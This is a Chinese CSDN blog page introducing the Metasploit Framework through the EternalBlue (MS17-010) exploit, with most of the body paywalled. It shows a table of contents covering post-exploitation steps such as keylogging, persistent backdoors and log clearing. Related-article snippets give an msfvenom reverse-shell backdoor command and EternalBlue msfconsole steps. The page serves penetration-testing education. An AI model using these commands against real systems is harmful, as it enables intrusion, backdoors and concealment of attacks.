Metasploit Framework(MSF)的使用

最新推荐文章于 2024-05-31 16:35:50 发布
置顶 最新推荐文章于 2024-05-31 16:35:50 发布
阅读量2.7w 收藏 138
点赞数 47
分类专栏: 网络安全工具使用集锦 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36119192/article/details/83215257
版权

目录

Metasploit

Metasploit的安装和升级

MSF中加载自定义的exploit模块

漏洞利用(exploit)

攻击载荷(payload)

Meterpreter

MS17_010(永恒之蓝)

Auxiliary辅助探测模块

Exploit漏洞利用模块

Payload攻击载荷模块

后渗透阶段

Post 后渗透模块 

查看主机是否运行在虚拟机上

关闭杀毒软件 

获取目标主机的详细信息

访问文件系统

上传/下载文件

权限提升

获取用户密码

运行程序

屏幕截图

创建一个新账号

启用远程桌面

键盘记录

进程迁移

禁止目标主机使用键盘鼠标

用目标主机摄像头拍照

使用扩展库

生成持续性后门

设置Socks4a代理

portfwd端口转发

清除事件日志

导入并执行PowerShell脚本

加载stdapi

升级Session

Meterpreter的更多用法

Metasploit

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。

MSF的更新:msfupdate

Metasploit的安装和升级

在一般的linux中,默认是不安装MSF的。以下是在非kali的Linux下安装MSF框架。

一键安装


                

        

        

    




        

            

                

                

                了解本专栏
                
                
                  
                订阅专栏 解锁全文
                 
                
                    
                    超级会员免费看
                
            

            
            
            
        

    

      

        

            

              
                
                  谢公子
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    47
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    138
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  18
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          

                

                        订阅专栏
                










                



	

		

			

				
					
简单的利用msf渗透框架

				
			

			

				

					weixin_42035825的博客
				

				

					03-23
					
					482
					
				

			

		

		

			
				
实战案例:
主机扫描:
收集信息是渗透测试中的第一步,它的重要性就不必多说了,其主要目标是尽可能多地发现有关目标机器的信息。获取的信息越多,渗透的概率就越大。该步骤的主要关注点是目标机器IP地址,可用服务,开放端口等。
使用msf的辅助模块进行端口扫描:
辅助模块是Metasploit的内置模块,首先利用search命令搜索有那些可用端口模块:
msf5 > search  portsca...

			
		

	



                

              
                



	

		

			

				
					
MSF(Metasploit Framework)详细介绍及用法【新手篇】

				
			

			

				

					h1008685的博客
				

				

					04-04
					
					3286
					
				

			

		

		

			
				
MSF核心组件介绍,MSF常用模块介绍【exploit,payload,auxiliary,post-exploitation,encoder,nops,evasion】基础命令【启动msf,数据库管理,查找和使用模块,配置模块,执行模块
,会话管理,辅助命令,系统命令】MSf初始配置【初始化数据库,创建/切换/删除工作区,扫描数据,查看扫描结果】

			
		

	



                


  
              

                


	

		

			

				
					
【Web安全】kali渗透工具MSF以及msfconsole命令详解

					
最新发布

				
			

			

				

					2301_77472496的博客
				

				

					05-31
					
					1032
					
				

			

		

		

			
				
记录一次体验kali渗透工具MSF以及msfconsole命令详解

			
		

	





	

		

			

				
					
metasploit-framework教程(基础篇)

				
			

			

				

					hackerisking的博客
				

				

					02-24
					
					464
					
				

			

		

		

			
				
此时将会生成位于home文件夹且名为test.exe的可执行文件(病毒),与metasploit上的multi/handler模块配合,操控靶机电脑。在所有的参数中,最重要的有四个:LHOST和LPORT(监听IP和端口),RHOST和RPORT(靶机IP和端口)这四个参数要设置哪两个,依选择的模块而定。这样,对模块的设置就大功告成了,然后就用exploit/run运行模块。metasploit还有一个好用的拓展功能——msfvenom。在use [模块]后,使用options查看参数。

			
		

	



		

			
		



	

		

			

				
					
MetaSploit framework基础知识

				
			

			

				

					知其所以然
				

				

					08-17
					
					1150
					
				

			

		

		

			
				
1,专业术语
渗透攻击(Exploit):漏洞利用程序(代码)。流行的渗透攻击技术包括缓冲区溢出,web应用程序漏洞攻击(比如SQL注入,以及利用配置错误等。
攻击负荷(Payload): 目标系统在被渗透攻击之后执行的代码。通常也称之为shellcode,目标系统在执行了shellcode之后,才会提供一个命令行shell。

2,接口以及启动 方式
Msfconsole: msf终端

			
		

	





	

		

			

				
					
【工具使用】——Metasploit(MSF)使用详解(超详细)

					
热门推荐

				
			

			

				

					weixin_45588247的博客
				

				

					08-12
					
					9万+
					
				

			

		

		

			
				
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.

			
		

	





	

		

			

				
					
MSF中sessions命令使用

				
			

			

				

					qq_44624916的博客
				

				

					11-28
					
					5216
					
				

			

		

		

			
				
MSF使用

			
		

	





	

		

			

				
					
metasploit-framework-6.3.34.zip

				
			

			

				

					09-17
				

			

		

		

			
				
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会包含最新的功能、修复和性能改进。在网络安全领域,...

			
		

	





	

		

			

				
					
metasploitframework-win-x64

				
			

			

				

					10-05
				

			

		

		

			
				
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...

			
		

	





	

		

			

				
					
metasploitframework-latest.pkg

				
			

			

				

					01-14
				

			

		

		

			
				
metasploitframework-latest.pkg官网地址下载超级慢,大小196M,适用于MAC版本的MSF网络攻防软件,官网地址:

			
		

	





	

		

			

				
					
metasploit-framework-master.zip

				
			

			

				

					09-08
				

			

		

		

			
				
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测和利用工具,广泛应用于网络安全评估和渗透测试。它由 Rapid7 维护,是全球黑客社区的重要资源,同时也是信息安全专业人员的必备武器。"metasploit-...

			
		

	





	

		

			

				
					
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)

				
			

			

				

					10-05
				

			

		

		

			
				
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描
可直接输入指定的服务器,或客机扫描

			
		

	





	

		

			

				
					
metasploit-framework工具

				
			

			

				

					10-09
				

			

		

		

			
				
MSF漏洞测试工具 使用方法: 根据漏洞名称搜索 : search ms17_010 设置模块:use auxiliary/scanner/smb/smb_ms17_010 设置目标地址:set rhosts x.x.x.x 设置好了之后,run或者exploit 进行攻击

			
		

	





	

		

			

				
					
渗透测试 ( 4 ) --- Meterpreter 命令详解

				
			

			

				

					freeking101的博客
				

				

					07-02
					
					8383
					
				

			

		

		

			
				
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.

			
		

	





	

		

			

				
					
metasploitMSF)渗透超细解说 -- 小黑渗透工具

				
			

			

				

					G_WEB_Xie的博客
				

				

					05-18
					
					1930
					
				

			

		

		

			
				
metasploit Frameworkmsf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心:    记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油  ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。

			
		

	





	

		

			

				
					
msf 获取一个普通的session 控制windows

				
			

			

				

					weixin_44286136的博客
				

				

					05-19
					
					2637
					
				

			

		

		

			
				
msf 获取session
在kali终端中打开msfconsole控制台
开启监听
use exploit/multi/handler
设置tcp监听
set payload windows/meterpreter/reverse_tcp


再次开启一个终端进行(shift+ctrl+T),查看本机ip
利用msfvenom制作木马程序
说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell
-e 编码方式
-i 编码次数
-b 在生成的程序

			
		

	





	

		

			

				
					
MSF建立webshell后门,并监听端口建立session连接

				
			

			

				

					土拨鼠挖洞中的博客
				

				

					06-23
					
					1万+
					
				

			

		

		

			
				
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...

			
		

	





	

		

			

				
					
MSF使用小技巧

				
			

			

				

					永远是少年
				

				

					06-08
					
					4199
					
				

			

		

		

			
				
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF使用小技巧。
一、MSF命令行开启
二、MSF退出
三、MSF 数据库导入和导出
四、MSF会话设置

			
		

	





	

		

			

				
					
metasploit-frameworkMSF)工具的使用

				
			

			

				

					weixin_42299610的博客
				

				

					03-18
					
					1086
					
				

			

		

		

			
				
初始化metasploit-framework
msfconsole


查看payload模块
show payloads

使用payload:windows/x64/pingback_reverse_tcp,查看payload选项
use windows/x64/pingback_reverse_tcp
show options


另打开一个终端,制作windows/x64/pingbac...

			
		

	





	

		

			

				
					
kali 的msf怎么使用

				
			

			

				

					03-31
				

			

		

		

			
				
MsfMetasploit Framework的缩写,是一款开源的网络安全渗透测试工具。在Kali Linux中,Msf已经预装好了,可以通过以下步骤启动Msf:

1. 打开终端,输入命令“msfconsole”进入Msf控制台。

2. 在控制台中输入“help”命令,查看支持的模块和指令。

3. 使用“search”命令搜索可用的模块,例如“search ftp”可以搜索所有关于FTP漏洞的模块。

4. 使用“use”命令选择一个模块,例如“use exploit/windows/smb/ms17_010_eternalblue”。

5. 根据模块的要求设置参数,例如“set RHOST 192.168.1.100”设置目标主机的IP地址。

6. 执行攻击,例如“exploit”命令。

7. 如果攻击成功,可以使用“sessions”命令查看会话列表,并使用“sessions -i <会话编号>”命令进入一个会话。

8. 在会话中,可以使用各种命令执行攻击、获取信息等操作。例如“shell”命令可以获取目标主机的shell权限,然后执行各种命令。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 18

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
谢公子

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值